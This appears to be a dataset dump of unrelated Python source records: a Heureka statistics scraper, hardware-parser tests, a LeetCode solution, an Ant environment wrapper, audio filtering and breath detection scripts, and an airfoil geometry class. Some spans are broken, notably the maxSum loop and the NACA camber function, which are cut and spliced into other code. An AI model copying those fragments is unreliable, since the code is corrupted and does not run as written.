login_page.soup.find(\"form\", {\"class\": \"c-form c-form--login js-form\"})\n\n login_form.find(\"input\", {\"name\": \"email\"})[\"value\"] = parameters.get('Entity').get(entity).get(login).get('Login')\n login_form.find(\"input\", {\"name\": \"password\"})[\"value\"] = parameters.get('Entity').get(entity).get(login).get('Password')\n\n # submit form\n browser.submit(login_form, login_page.url)\n\n # this is way how to load config from config JSON.\n NO_OF_SHOPS = len(parameters.get('Entity').get(entity).get(login).get('Shop_name'))\n\n for index in range(0, NO_OF_SHOPS):\n if entity == 'Heureka.cz':\n report_url = browser.get('http://sluzby.heureka.cz/obchody/statistiky/?shop=' + parameters.get('Entity').get(entity).get(login).get('Shop_id')[index] + '&from=' + scrape_date + '&to=' + scrape_date)\n if entity == 'Heureka.sk':\n report_url = browser.get('http://sluzby.heureka.sk/obchody/statistiky/?shop=' + parameters.get('Entity').get(entity).get(login).get('Shop_id')[index] + '&from=' + scrape_date + '&to=' + scrape_date)\n\n # placeholder for SK heureka or sometihing simillar\n shop = parameters.get('Entity').get(entity).get(login).get('Shop_name')[index]\n # create BeautifulSoup object\n report_object = report_url.soup\n # create HTML of content table\n tabulka = report_object.find_all('table', {'class': 'shop-list roi'})\n # create empty list so it will be easy to append results there.\n L = []\n rows = BeautifulSoup(str(tabulka), features=\"lxml\").findChildren(['tr'])\n for row in rows:\n cells = row.findChildren('td') # define table\n cells = cells[0:4] # Take just first 4 values of table\n # replace HTML chars\n if len(cells) >= 4:\n temp = sanitizeStrings(cells[3])\n costs = temp[0]\n currency = temp[1]\n if currency == u'Kč':\n currency = 'CZK'\n if currency == u'€':\n currency = 'EUR'\n\n temp = sanitizeStrings(cells[2])\n cpc = temp[0]\n visits_temp = cells[1].string.replace('\\xa0', '') # if value > 999 and it result would be 'X XXX'\n visits = float(visits_temp)\n # name cleaning...\n name = cells[0].string\n if name is None:\n name = entity\n\n prvekL = {'shop': shop, 'date': scrape_date, 'name': name, 'visits': visits, 'cpc': cpc,\n 'costs': costs, 'currency': currency}\n\n L.append(prvekL)\n\n keys = ['name', 'visits', 'cpc', 'costs', 'currency', 'shop', 'date']\n\n with open('/data/out/tables/' + parameters.get('Entity').get(entity).get(login).get('Shop_name')[index] + '.csv', mode='a+', encoding='utf-8') as output_file:\n dict_writer = csv.DictWriter(output_file, keys, lineterminator='\\n', delimiter=',', quotechar='\"')\n dict_writer.writeheader()\n dict_writer.writerows(L)\n","sub_path":"main_new.py","file_name":"main_new.py","file_ext":"py","file_size_in_byte":6856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"613030330","text":"#!/usr/bin/env python3\n\nfrom parsers import read_smartctl\nfrom parsers import read_decode_dimms\nfrom parsers import read_dmidecode\nfrom parsers import read_lspci_and_glxinfo\nfrom parsers import read_lscpu\nfrom tests.parsers.read_file import read_file\n\nfiledir = \"tests/source_files/polveroso/\"\n\n\ndef test_lspci():\n expect = [\n {\n \"type\": \"graphics-card\",\n \"working\": \"yes\",\n \"brand\": \"ASUSTeK Computer Inc.\",\n \"model\": \"GeForce 9400 GT\",\n \"internal-name\": \"G96\", # Missing glxinfo...\n \"brand-manufacturer\": \"Nvidia\",\n }\n ]\n # False to ignore missing glxinfo\n output = read_lspci_and_glxinfo.parse_lspci_and_glxinfo(False, read_file(filedir, 
\"lspci.txt\"), read_file(filedir, \"glxinfo.txt\"))\n\n assert output == expect\n\n\ndef test_lscpu():\n expect = [\n {\n \"type\": \"cpu\",\n \"working\": \"yes\",\n \"isa\": \"x86-64\",\n \"model\": \"Core 2 Duo E7300\",\n \"brand\": \"Intel\",\n \"core-n\": 2,\n \"thread-n\": 2,\n \"frequency-hertz\": 2660000000,\n }\n ]\n output = read_lscpu.parse_lscpu(read_file(filedir, \"lscpu.txt\"))\n\n assert output == expect\n\n\ndef test_ram():\n output = read_decode_dimms.parse_decode_dimms(read_file(filedir, \"dimms.txt\"))\n\n assert len(output) == 0\n\n\ndef test_baseboard():\n expect = {\n \"type\": \"motherboard\",\n \"working\": \"yes\",\n \"brand\": \"ASUSTeK Computer INC.\",\n \"model\": \"P5QL-E\",\n \"sn\": \"MS666999ABCDEF123\",\n }\n output = read_dmidecode._get_baseboard(read_file(filedir, \"baseboard.txt\"))\n\n assert output == expect\n\n\ndef test_connector():\n baseboard = read_dmidecode._get_baseboard(read_file(filedir, \"baseboard.txt\"))\n\n expect = {\n \"type\": \"motherboard\",\n \"working\": \"yes\",\n \"brand\": \"ASUSTeK Computer INC.\",\n \"model\": \"P5QL-E\",\n \"sn\": \"MS666999ABCDEF123\",\n \"ps2-ports-n\": 2,\n \"usb-ports-n\": 6,\n \"serial-ports-n\": 1,\n \"mini-jack-ports-n\": 1,\n \"ethernet-ports-n\": 1,\n \"ide-ports-n\": 1,\n \"sata-ports-n\": 6,\n \"esata-ports-n\": 1,\n \"firewire-ports-n\": 2,\n \"notes\": \"Unknown connector: None / Other (AUDIO / AUDIO)\",\n }\n output = read_dmidecode._get_connectors(read_file(filedir, \"connector.txt\"), baseboard)\n\n assert output == expect\n\n\ndef test_chassis():\n expect = [\n {\n \"type\": \"case\",\n \"brand\": \"Chassis Manufacture\",\n \"sn\": \"Chassis Serial Number\",\n }\n ]\n output = read_dmidecode.parse_case(read_file(filedir, \"chassis.txt\"))\n\n assert output == expect\n","sub_path":"tests/parsers/test_polveroso.py","file_name":"test_polveroso.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"329323811","text":"class Solution:\n def maxSum(self, nums1: List[int], nums2: List[int]) -> int:\n res, a, b, i, j, m, n=0, 0, 0, 0, 0, len(nums1), len(nums2)\n mod=10**9+7\n while inums2[j]):\n b+=nums2[j]\n j+=1\n else:\n res+=max(a, b)+nums1[i]\n a, b=0, 0\n i+=1\n j+=1\n return (res+max(a, b))%mod\n\n","sub_path":"python/get-the-maximum-score.py","file_name":"get-the-maximum-score.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"248063819","text":"from ant_environments.create_maze_env import create_maze_env\n\n\"\"\"Environments taken from HIRO paper github repo: https://github.com/tensorflow/models/tree/master/research/efficient-hrl\"\"\"\n\nclass Ant_Navigation_Environments():\n\n def __init__(self, environment_name):\n self.env = create_maze_env(env_name=environment_name).gym # names [\"AntGather\" ,\"AntMaze\", \"AntPush\", \"AntFall\", \"AntBlock\"]\n self.unwrapped = self.env.unwrapped\n self.spec = self.env.spec\n self.action_space = self.env.action_space\n\n def reset(self):\n self.steps_taken = 0\n return self.env.reset()\n\n def step(self, action):\n self.steps_taken += 1\n next_state, reward, _, _ = self.env.step(action)\n if self.steps_taken >= 500: done = True\n else: done = False\n return next_state, reward, done, 
_\n\n\n\n","sub_path":"Environments/Ant_Navigation_Environments.py","file_name":"Ant_Navigation_Environments.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"133244850","text":"import matplotlib.pyplot as plot\nimport math\nimport numpy as np\nfrom scipy import signal\n\n\ndef _EXIT_():\n print('Выход..')\n exit(0)\n\n\ndef INPUT():\n global str1\n str1 = input('ВВОД P: ')\n\n\ndef add_value_in_register(summator, value):\n for i in range(len(summator) - 1):\n summator[i] = summator[i + 1]\n summator[len(summator) - 1] = value\n\ndef get_summ(summator):\n result = 0\n for value in summator:\n result += value\n\n return result\n\ndef getResult(N, P):\n k = P / N\n # пустые массивы значений\n X = np.array(0)\n S = np.array(0)\n # частота пропускания и частота заграждения\n wp, ws = 0.2, 0.3\n # усиление в полосе пропускания и подавление вне её\n gpass, gstop = 0.1, 50.0\n\n b, a = signal.iirdesign(wp, ws, gpass, gstop, analog=False, ftype='butter', output='ba')\n w, h = signal.freqz(b, a)\n\n x_values = w/np.pi\n y_values = 20*np.log10(abs(h))\n return {'x_values': x_values, 'y_values': y_values}\n\n\ndef plotGraf(data, x_label=\"x_values\", y_label='y_values'):\n data_x = data[x_label]\n data_y = data[y_label]\n plot.ylabel('рис 1')\n plot.plot(data_x, data_y)\n\n\n\n\nif __name__ == \"__main__\":\n N = 100\n print('run task4')\n #INPUT()\n #P = int(str1)\n P = 15\n data = getResult(N, P)\n plot.subplot(311)\n plotGraf(data)\n plot.show()","sub_path":"task4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"246272942","text":"import sys\nfrom scipy.io import wavfile\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport peakutils\nfrom peakutils.plot import plot as pplot\nfrom matplotlib import pyplot\nfrom scipy.signal import butter, lfilter, freqz\n\n#class Event:\n#\tfloat timeStamp\n#\tfloat intensity\n#\tfloat duration\n\n##GLOBALS\norder = 6\nfs = 30.0\ncutoff = 3.667 \nSTEP = 1.0\n\ndef butter_lowpass(cutoff, fs, order=5):\n nyq = 0.5 * fs\n normal_cutoff = cutoff / nyq\n b, a = butter(order, normal_cutoff, btype='low', analog=False)\n return b, a\n\ndef butter_lowpass_filter(data, cutoff, fs, order=5):\n b, a = butter_lowpass(cutoff, fs, order=order)\n y = lfilter(b, a, data)\n return y\n\ndef readAndExtract(filename):\n\t# Load the data and calculate the time of each sample\n\tsamplerate, y = wavfile.read(filename)\n\tx = np.arange(len(y))\n\t#Handle both mono and stereo audi\t\n\tif type(y[0]) == np.ndarray:\n\t\ty = y[0:len(y)-1:STEP, 1]\n\telse:\n\t\ty = y[0:len(y)-1:STEP]\n\ty = normalize(y)[0]\n\ty = butter_lowpass_filter(y, cutoff, fs, order)\n\tx = x[0:len(x)-1:STEP]\n\treturn x, y\n\ndef findPeaks(y):\n\treturn peakutils.indexes(y, thres=0.1, min_dist=44100)\n\ndef plot(x, y, indexes, breaths):\n\tpyplot.figure(figsize=(10,6))\n\tpplot(x, y, indexes)\n\tpyplot.title('Find peaks')\n\t#show breaths\n\tfor breath in breaths:\n\t\tpyplot.axvspan(breath[2], breath[3], color='y', alpha=0.5, lw=0)\n\t\n\tpyplot.show()\n\ndef normalize(a, axis=-1, order=2):\n l2 = np.atleast_1d(np.linalg.norm(a, order, axis))\n l2[l2==0] = 1\n return a / np.expand_dims(l2, axis)\n\ndef findBreaths(x, y, peaks):\n\tbreaths = []\n\tMAX_BREATH = 44100\n\tBYTE_SIZE = 5000\n\tTHRESH = .03\n\tbmin = None\n\tbmax = None\n\tfor peak in peaks:\n\t\tindex = peak - 
\n\t\t#find beginning of breath\n\t\twhile (index > peak-MAX_BREATH):\n\t\t\tsublist = y[(index)*STEP:(index + BYTE_SIZE)*STEP]\n\t\t\tif not len(sublist): break\n\t\t\tavg = sum([abs(x) for x in sublist])/len(sublist)\n\t\t\tif (abs(avg) < THRESH):\n\t\t\t\tbmin = index\n\t\t\t\tbreak\n\t\t\tindex = index - BYTE_SIZE\n\t\tif not bmin: bmin = index\n\t\tindex = peak\n\t\t\n\t\t#find end of breath\n\t\twhile (index < peak+MAX_BREATH):\n\t\t\tsublist = y[(index)*STEP:(index + BYTE_SIZE)*STEP]\n\t\t\tif not len(sublist): break\n\t\t\tavg = sum([abs(x) for x in sublist])/len(sublist)\n\t\t\tif (abs(avg) < THRESH):\n\t\t\t\tbmax = index\n\t\t\t\tbreak\n\t\t\tindex = index + BYTE_SIZE\n\t\tif not bmax: bmax = index\n\t\tbreaths.append([peak, y[peak], bmin, bmax])\n\t\tbmin = None\n\t\tbmax = None\n\treturn aggregate(breaths)\n\ndef aggregate(breaths):\n\ti = 0\n\twhile i < len(breaths)-1:\n\t\tif (breaths[i][3] > breaths[i+1][2]):\n\t\t\tbreaths[i][3] = breaths[i+1][3]\n\t\t\tbreaths[i][1] = max(breaths[i][1], breaths[i+1][1])\n\t\t\tdel breaths[i+1]\n\t\ti = i + 1\n\treturn breaths\n\ndef writeToFile(file, breaths):\n\tfile = open(file, 'w')\n\tfor breath in breaths:\n\t\tfor val in breath:\n\t\t\tfile.write(str(val)+\", \")\n\t\t\tprint(val)\n\t\tfile.write(\"\\n\")\n\t\tprint()\n\tfile.close()\n\nif len(sys.argv) > 1:  # sys.argv always contains the script name, so check for a real argument\n\tfile = sys.argv[1]\nelse:\n\tfile = \"30sleep.wav\"\n\nx,y = readAndExtract(file)\npeaks = findPeaks(y)\nbreaths = findBreaths(x, y, peaks)\nwriteToFile('out.txt', breaths)\n#plot(x, y, peaks, breaths)\nprint(breaths)\n","sub_path":"api/pd2.py","file_name":"pd2.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"163855836","text":"\"\"\"A class defining an airfoil.\"\"\"\n\nimport math\nimport json\nimport copy\nimport os\nimport operator\nimport warnings\n\nimport matplotlib.pyplot as plt\nimport scipy.interpolate as interp\nimport subprocess as sp\nimport numpy as np\n\nfrom .poly_fits import multivariablePolynomialFit, multivariablePolynomialFunction, autoPolyFit, multivariableRMS, multivariableR2\nfrom .exceptions import DatabaseBoundsError, CamberSolverNotConvergedError, PolyFitBoundsError\n\n\nclass Airfoil:\n \"\"\"A class defining an airfoil. If the airfoil geometry is defined using outline\n points, then when this class is initialized, a solver will be automatically\n run to determine the camber line and thickness distribution of the airfoil.\n The parameters \"camber_relaxation\", \"le_loc\", and \"camber_termination_tol\" then\n have bearing on this solver.\n\n When using the member methods get_CL, get_CD, get_Cm, get_CLa, get_CLM, get_CLRe,\n and get_aL0, the default parameters are dependent upon the type of airfoil.\n\n For all airfoil types except 'functional', 'alpha', 'trailing_flap_deflection',\n and 'trailing_flap_fraction' default to 0.0.\n\n For 'functional' airfoils, the defaults are specified by the user.\n\n For 'linear' airfoils, 'Mach' and 'Rey' have no effect on computations.\n\n For 'database' airfoils, 'Mach' and 'Rey' default to the average value in the database,\n if the database is dependent on that variable. 
Otherwise, they default to the value\n specified as constant when the database was generated.\n\n For 'poly_fit' airfoils, 'Mach' and 'Rey' default to the values given in the fit file.\n If export_polynomial_fits() is used, these values are the same as those for the \n 'database' type.\n\n Parameters\n ----------\n name : str\n Name of the airfoil.\n\n airfoil_input : dict or str\n Dictionary or path to JSON object describing the airfoil.\n\n verbose : bool, optional\n Whether to display information on the progress of parameterizing the geometry\n for an airfoil defined by a set of outline points. Defaults to False.\n\n camber_relaxation : float, optional\n A value between 0.0 and 1.0 that defines how much of the update at each\n iteration of the camber line solver should be accepted. Helpful for some\n poorly behaved cases. Defaults to 1.0 (full update).\n \n le_loc : list, optional\n Gives the location of the leading edge relative to the given points for an airfoil\n defined by a set of outline points. If this is given, the camber line will be forced\n to intersect this point. THIS POINT SHOULD LIE ON THE AIRFOIL OUTLINE. If not given,\n the camber line solver will try to iteratively find the leading edge (the point where\n the camber line intersects the front of the profile).\n\n camber_termination_tol : float, optional\n The tolerance below which the maximum approximate error in the camber line estimate\n must fall in order for the camber line solver to terminate. Defaults to 1e-10.\n\n max_iterations : int, optional\n Maximum number of iterations for the camber line solver. Defaults to 100.\n \"\"\"\n\n def __init__(self, name, airfoil_input, **kwargs):\n \n self.name = name\n self._load_params(airfoil_input)\n if \"camber_solver_kwargs\" in list(self._input_dict.keys()):\n kwarg_dict = self._input_dict[\"camber_solver_kwargs\"]\n self._verbose = kwarg_dict.get(\"verbose\", False)\n self._camber_relaxation = kwarg_dict.get(\"camber_relaxation\", 1.0)\n self._le_loc = kwarg_dict.get(\"le_loc\", None)\n self._camber_termination_tol = kwarg_dict.get(\"camber_termination_tol\", 1e-10)\n self._max_iterations = kwarg_dict.get(\"max_iterations\", 100)\n else:\n self._verbose = kwargs.get(\"verbose\", False)\n self._camber_relaxation = kwargs.get(\"camber_relaxation\", 1.0)\n self._le_loc = kwargs.get(\"le_loc\", None)\n self._camber_termination_tol = kwargs.get(\"camber_termination_tol\", 1e-10)\n self._max_iterations = kwargs.get(\"max_iterations\", 100)\n\n # Load flaps\n self._load_flaps()\n\n # Store undeformed outlines\n self._initialize_geometry()\n\n # Specify database DOF parameters\n self._allowable_dofs = [\"alpha\", \"Rey\", \"Mach\", \"trailing_flap_deflection\", \"trailing_flap_fraction\"]\n self._dof_defaults = {\n \"alpha\" : 0.0,\n \"Rey\" : 1e6,\n \"Mach\" : 0.0,\n \"trailing_flap_deflection\" : 0.0,\n \"trailing_flap_fraction\" : 0.0\n }\n\n # Load input file\n input_file = self._input_dict.get(\"input_file\", None)\n if input_file is not None:\n if self._type == \"database\":\n self.import_database(filename=input_file)\n elif self._type == \"poly_fit\":\n self.import_polynomial_fits(filename=input_file)\n\n\n self._raise_poly_bounds_error = True\n\n\n def set_err_state(self, **kwargs):\n \"\"\"Sets the error state for the airfoil. Each may be specified as 'raise' or 'ignore'.\n\n Parameters\n ----------\n poly_fit_bounds : str, optional\n How to handle PolyFitBoundsError. 
Defaults to 'raise'.\n \"\"\"\n\n # Polynomial fit bounds\n if kwargs.get(\"poly_fit_bounds\", \"raise\") == \"raise\":\n self._raise_poly_bounds_error = True\n else:\n self._raise_poly_bounds_error = False\n\n\n def set_verbosity(self, verbosity):\n \"\"\"Sets the verbosity of the airfoil.\"\"\"\n self._verbose = verbosity\n\n\n def set_type(self, database_type):\n \"\"\"Determines how the aerodynamic coefficients will be calculated.\n\n Parameters\n ----------\n database_type: str\n \"linear\", \"functional\", \"database\", or \"poly_fit\". Airfoil\n will automatically check if it has the necessary data to perform\n the given type of computation and throw a warning if it does not.\n\n \"\"\"\n\n # Check for proper type spec\n if database_type not in [\"linear\", \"database\", \"poly_fit\", \"functional\"]:\n raise IOError(\"{0} is not a valid type specification.\".format(database_type))\n\n # Check for linear data\n if database_type == \"linear\":\n if not hasattr(self, \"_CLa\"):\n raise RuntimeWarning(\"Airfoil {0} does not have linear coefficients specified. Reverting to type '{1}' for computations.\".format(self.name, self._type))\n else:\n self._type = database_type\n\n # Check for database\n if database_type == \"database\":\n if not hasattr(self, \"_data\"):\n raise RuntimeWarning(\"Airfoil {0} does not have a database of coefficients. Reverting to type '{1}' for computations.\".format(self.name, self._type))\n else:\n self._type = database_type\n\n # Set up data normalization\n self._data_norms = np.zeros((1,self._num_dofs))\n for i in range(self._num_dofs):\n self._data_norms[0,i] = np.max(np.abs(self._data[:,i]))\n\n # Make sure we don't divide by zero\n self._data_norms[np.where(self._data_norms==0.0)] = 1.0\n\n # Normalize independent vars\n self._normed_ind_vars = self._data[:,:self._num_dofs]/self._data_norms\n\n # Determine default Mach and Reynolds number\n if \"Rey\" in list(self._dof_db_cols.keys()):\n i = self._dof_db_cols[\"Rey\"]\n Re_min = np.min(self._data[:,i])\n Re_max = np.max(self._data[:,i])\n self._dof_defaults[\"Rey\"] = 0.5*(Re_max+Re_min)\n\n if \"Mach\" in list(self._dof_db_cols.keys()):\n i = self._dof_db_cols[\"Mach\"]\n M_min = np.min(self._data[:,i])\n M_max = np.max(self._data[:,i])\n self._dof_defaults[\"Mach\"] = 0.5*(M_max+M_min)\n\n # Check for polynomial fits\n if database_type == \"poly_fit\":\n if not hasattr(self, \"_CL_poly_coefs\"):\n raise RuntimeWarning(\"Airfoil {0} does not have a set of polynomial fits. Reverting to type '{1}' for computations.\".format(self.name, self._type))\n else:\n self._type = database_type\n\n # Check for functional definition\n if database_type == \"functional\":\n if not hasattr(self, \"_CL\"):\n raise RuntimeWarning(\"Airfoil {0} does not have functional definitions of coefficients. Reverting to type '{1}' for computations.\".format(self.name, self._type))\n else:\n self._type = database_type\n\n\n def _load_params(self, airfoil_input):\n\n # Load input dict\n if isinstance(airfoil_input, str):\n # Load JSON object\n with open(airfoil_input, 'r') as json_handle:\n self._input_dict = json.load(json_handle)\n elif isinstance(airfoil_input, dict):\n self._input_dict = airfoil_input\n else:\n raise IOError(\"{0} is not an allowed airfoil definition. Must be path or dictionary.\".format(airfoil_input))
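# For illustration, a minimal 'linear' input dict consumed by this method might
# look like the following; the numbers are invented for the example, not taken
# from any real airfoil:
#
#     {
#         "type": "linear",
#         "aL0": -0.036,   # zero-lift angle of attack [rad]
#         "CLa": 6.28,     # lift slope [1/rad]
#         "CmL0": -0.05,
#         "CD0": 0.006,
#         "CL_max": 1.4
#     }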
\n\n # Store type\n self._type = self._input_dict.get(\"type\", \"linear\")\n\n # If linear, store coefficients\n if self._type == \"linear\":\n self._aL0 = self._input_dict.get(\"aL0\", 0.0)\n self._CLa = self._input_dict.get(\"CLa\", 2*np.pi)\n self._Cma = self._input_dict.get(\"Cma\", 0.0)\n self._CD0 = self._input_dict.get(\"CD0\", 0.0)\n self._CD1 = self._input_dict.get(\"CD1\", 0.0)\n self._CD2 = self._input_dict.get(\"CD2\", 0.0)\n self._CL_max = self._input_dict.get(\"CL_max\", np.inf)\n if abs(self._CL_max) < 1e-10:\n warnings.warn(\"You have specified a maximum lift coefficient of 0. Are you sure you want to do this?...\")\n self._CmL0 = self._input_dict.get(\"CmL0\", 0.0)\n\n # For functional, store functions\n elif self._type == \"functional\":\n self._CL = self._input_dict[\"CL\"]\n self._CD = self._input_dict[\"CD\"]\n self._Cm = self._input_dict[\"Cm\"]\n\n\n def _load_flaps(self):\n # Loads flaps based on the input dict\n self._trailing_flap_type = self._input_dict.get(\"trailing_flap_type\", None)\n self._trailing_flap_hinge_height = self._input_dict.get(\"trailing_flap_hinge_height\", 0.0)\n\n\n def _initialize_geometry(self):\n # Initialize geometry based on whether points or a NACA designation were given\n\n # Check that there's only one geometry definition\n geom_dict = self._input_dict.get(\"geometry\", {})\n outline_points = geom_dict.get(\"outline_points\", None)\n NACA = geom_dict.get(\"NACA\", None)\n if outline_points is not None and NACA is not None:\n raise IOError(\"Outline points and a NACA designation may not both be specified for airfoil {0}.\".format(self.name))\n\n # Check for user-given points\n if outline_points is not None:\n self.geom_specification = \"points\"\n\n # Array given\n if isinstance(outline_points, np.ndarray):\n self._raw_outline = outline_points\n\n # 2D list given\n elif isinstance(outline_points, list):\n self._raw_outline = np.array(outline_points)\n \n # File\n else:\n\n # Import\n with open(outline_points, 'r') as input_handle:\n self._raw_outline = np.genfromtxt(input_handle)\n\n # Check for comma-delimited\n if np.isnan(self._raw_outline).any():\n with open(outline_points, 'r') as input_handle:\n self._raw_outline = np.genfromtxt(input_handle, delimiter=',')\n\n # Get number of points\n self._N_orig = self._raw_outline.shape[0]\n\n # Rearrange the coordinates if necessary to be top first then bottom\n top_ind = np.argmax(self._raw_outline[:,1])\n bot_ind = np.argmin(self._raw_outline[:,1])\n if bot_ind < top_ind: # Bottom came first\n self._raw_outline = self._raw_outline[::-1]\n\n # Calculate camber line and thickness\n self._calc_geometry_from_points()\n\n # NACA definition\n elif NACA is not None:\n self.geom_specification = \"NACA\"\n self._naca_closed_te = geom_dict.get(\"NACA_closed_te\", False)\n self._naca_des = NACA\n\n self._calc_geometry_from_NACA()\n\n # No geometry given\n else:\n self.geom_specification = \"none\"\n self._max_camber = geom_dict.get(\"max_camber\", 0.0)\n self._max_thickness = geom_dict.get(\"max_thickness\", 0.0)\n return\n\n \n def _calc_geometry_from_NACA(self):\n # Creates thickness, camber, camber derivative, and outline splines based on the NACA equations\n\n # 4-digit series\n if len(self._naca_des) == 4:\n\n # Stores the camber and thickness getters based on the NACA designation of the airfoil\n self._m = float(self._naca_des[0])/100\n self._p = float(self._naca_des[1])/10\n self._t = float(self._naca_des[2:])/100\n self._max_camber = 
self._m\n self._max_thickness = self._t\n\n # Camber line\n def camber(x):\n if self._p != 0.0:\n return np.where(x self._camber_termination_tol:\n iteration += 1\n\n # Determine camber line slope\n dyc_dx = np.gradient(y_c, x_c, edge_order=camber_deriv_edge_order)\n \n # Determine slope of lines perpendicular to the camber\n with np.errstate(divide=\"ignore\"):\n b = -1.0/dyc_dx\n\n # Loop through points on the camber line to find where their normal intersects the outline\n for i in range(num_camber_points):\n if self._le_loc is not None and i == 0:\n continue\n\n # Get point information\n xc = x_c[i]\n yc = y_c[i]\n bi = b[i]\n\n # Estimate the intersection points\n x_t[i], y_t[i], _ = self._get_intersection_point(xc, yc, bi, \"top\")\n x_b[i], y_b[i], _ = self._get_intersection_point(xc, yc, bi, \"bottom\")\n\n # Calculate new camber line points\n x_c_new = 0.5*(x_t+x_b)\n y_c_new = 0.5*(y_t+y_b)\n if self._le_loc is not None:\n x_c_new[0] = self._le_loc[0]\n y_c_new[0] = self._le_loc[1]\n\n # Plot new and old estimate\n if False:\n plt.figure()\n plt.plot(self._raw_outline[:,0], self._raw_outline[:,1], 'b-', label='Outline Data')\n plt.plot(x_c, y_c, 'r--', label='Old Camber Line Estimate')\n plt.plot(x_c_new, y_c_new, 'g--', label='New Camber Line Estimate')\n plt.plot(x_t, y_t, 'rx')\n plt.plot(x_b, y_b, 'ro')\n plt.legend()\n plt.gca().set_aspect('equal', adjustable='box')\n plt.show()\n\n # Approximate error\n x_diff = x_c_new-x_c\n y_diff = y_c_new-y_c\n camber_error = np.max(np.sqrt(x_diff*x_diff+y_diff*y_diff))\n if self._verbose:\n print(\"{0:<20}{1:<20}\".format(iteration, camber_error))\n\n # Sort, just in case things got messed up\n sorted_ind = np.argsort(x_c_new)\n x_c_new = x_c_new[sorted_ind]\n y_c_new = y_c_new[sorted_ind]\n\n # Update for next iteration\n x_c = self._camber_relaxation*x_c_new+(1.0-self._camber_relaxation)*x_c\n y_c = self._camber_relaxation*y_c_new+(1.0-self._camber_relaxation)*y_c\n\n # Check iteration limit\n if iteration == self._max_iterations:\n raise CamberSolverNotConvergedError(self.name, camber_error)\n\n if self._verbose: print(\"Camber line solver converged.\")\n\n # Calculate where the camber line intersects the outline to find the leading edge\n if self._le_loc is None:\n dyc_dx = np.gradient(y_c, x_c, edge_order=2)\n b = dyc_dx[0]\n x_le, y_le, self._s_le = self._get_intersection_point(x_c[0], y_c[0], b, \"leading_edge\")\n le = np.array([x_le, y_le])\n x_c = np.insert(x_c, 0, le[0])\n y_c = np.insert(y_c, 0, le[1])\n else:\n le = self._le_loc\n\n if self._verbose: print(\"Leading edge: {0}\".format(le))\n\n if self._verbose:\n # Plot\n plt.figure()\n plt.plot(self._raw_outline[:,0], self._raw_outline[:,1], 'b-', label='Outline Data')\n plt.plot(x_c, y_c, 'g--', label='Final Camber Line Estimate')\n plt.legend()\n plt.gca().set_aspect('equal', adjustable='box')\n plt.show()\n\n # Get trailing edge\n te = (self._raw_outline[0]+self._raw_outline[-1])*0.5\n if self._verbose: print(\"Trailing edge: {0}\".format(te))\n\n # Renormalize using new leading and trailing edge\n self._normalize_points(self._raw_outline, le, te)\n self._x_outline, self._y_outline = self._create_splines_of_s(self._raw_outline)\n\n # Normalize camber line points\n camber_points = np.concatenate([x_c[:,np.newaxis], y_c[:,np.newaxis]], axis=1)\n self._normalize_points(camber_points, le, te)\n\n # Store camber and max camber\n self._camber_line = interp.UnivariateSpline(camber_points[:,0], camber_points[:,1], k=5, s=1e-10)\n self._max_camber = 
np.max(camber_points[:,1])\n\n # Store camber line derivative\n y_c = self._camber_line(x_space)\n dyc_dx= np.gradient(y_c, x_space)\n self._camber_deriv = interp.UnivariateSpline(x_space, dyc_dx, k=5, s=1e-10)\n with np.errstate(divide=\"ignore\"):\n b = -1.0/dyc_dx\n\n # Find points on the surface to determine the thickness\n if self._verbose: print(\"Calculating thickness distribution...\", end=\"\")\n x_t_t = np.zeros_like(x_space)\n x_b_t = np.zeros_like(x_space)\n y_t_t = np.zeros_like(x_space)\n y_b_t = np.zeros_like(x_space)\n for i, xc in enumerate(x_space):\n if i == 0: continue # This point intersects the outline by definition and so will have zero thickness\n yc = y_c[i]\n bi = b[i]\n\n x_t_t[i], y_t_t[i],_ = self._get_intersection_point(xc, yc, bi, \"top\")\n x_b_t[i], y_b_t[i],_ = self._get_intersection_point(xc, yc, bi, \"bottom\")\n\n # Store thickness distribution\n t = 0.5*np.sqrt((x_t_t-x_b_t)*(x_t_t-x_b_t)+(y_t_t-y_b_t)*(y_t_t-y_b_t))\n self._thickness = interp.UnivariateSpline(x_space, t, k=5, s=1e-10)\n self._max_thickness = np.max(t)\n if self._verbose: print(\"Done\")\n\n # Calculate estimated top and bottom points\n y_c_pred = self._camber_line(x_space)\n dyc_dx = np.gradient(y_c_pred, x_space)\n t_pred = self._thickness(x_space)\n theta = np.arctan(dyc_dx)\n S_theta = np.sin(theta)\n C_theta = np.cos(theta)\n\n x_b = x_space+t_pred*S_theta\n y_b = y_c_pred-t_pred*C_theta\n x_t = x_space-t_pred*S_theta\n y_t = y_c_pred+t_pred*C_theta\n \n # Plot\n if self._verbose:\n plt.plot(self._raw_outline[:,0], self._raw_outline[:,1], 'b-', label='Original Data')\n plt.plot(x_t, y_t, 'r--', label='Top Fit')\n plt.plot(x_b, y_b, 'r--', label='Bottom Fit')\n plt.legend()\n plt.gca().set_aspect('equal', adjustable='box')\n plt.show()\n\n\n def _normalize_points(self, points, le_coords, te_coords):\n # Takes the given points, translates them to the origin, rotates them to be at zero angle of attack, and scales so the chord length is unity\n\n # Translate\n points[:,0] -= le_coords[0]\n points[:,1] -= le_coords[1]\n\n # Rotate\n x_diff = te_coords[0]-le_coords[0]\n y_diff = te_coords[1]-le_coords[1]\n theta = -np.arctan2(y_diff, x_diff)\n R = np.array([[np.cos(theta), -np.sin(theta)],\n [np.sin(theta), np.cos(theta)]])\n points = np.matmul(R, points.T)\n\n #Scale\n c_unscaled = np.sqrt(x_diff*x_diff+y_diff*y_diff)\n points = points/c_unscaled\n\n\n def _get_intersection_point(self, xc, yc, b, surface, plot=False):\n # Calculates the point on the surface where the line extending from (xc, yc) with slope of b intersects\n # Uses the secant method to converge in s\n\n # Start s in the middle of the respective surface\n if surface == \"top\":\n s0 = 0.24\n 